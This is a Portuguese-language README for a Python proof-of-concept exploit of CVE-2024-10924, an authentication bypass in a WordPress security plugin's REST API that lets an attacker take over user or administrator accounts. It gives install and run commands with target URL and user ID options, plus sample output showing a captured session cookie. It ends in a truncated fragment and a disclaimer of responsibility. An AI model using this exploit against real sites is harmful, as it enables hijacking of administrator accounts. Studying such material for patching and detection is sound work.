
POC para CVE-2024-10924 escrito em Python
Uma falha no tratamento de erros na API REST do plugin Really Simple Plugins para WordPress (versões entre 9.0.0 e 9.1.1.1 incluídas) permite que um atacante, quando a Autenticação de Dois Fatores está ativada, ignore a autenticação e assuma o controle de uma conta de usuário ou administrador existente.
Como sou um cara legal, você também encontrará a versão 9.1.1.1 do plugin. Basta descompactar e enviar para a pasta wp-content/plugins. Não se esqueça de ativar o plugin e habilitar o 2FA.
Instale as dependências necessárias usando pip:
pip install -r requirements.txt
python exploit.py [-id USER_ID] URL
Com um ID de Usuário específico:
python exploit.py -id 10 http://localhost:8886/
Isso envia o payload de exploração com um ID de usuário 10.
Sem especificar o ID de Usuário:
python exploit.py http://localhost
O ID de Usuário padrão é 1.
Exploit successful.
--------------------------------------------------
session_id=xyz123; path=/; HttpOnly
--------------------------------------------------
Exploit failed. Maybe the target is not vulnerable or the user ID is incorrect.
verify=False) apenas se necessário para testes.Não sei, mas não sou responsável por nada.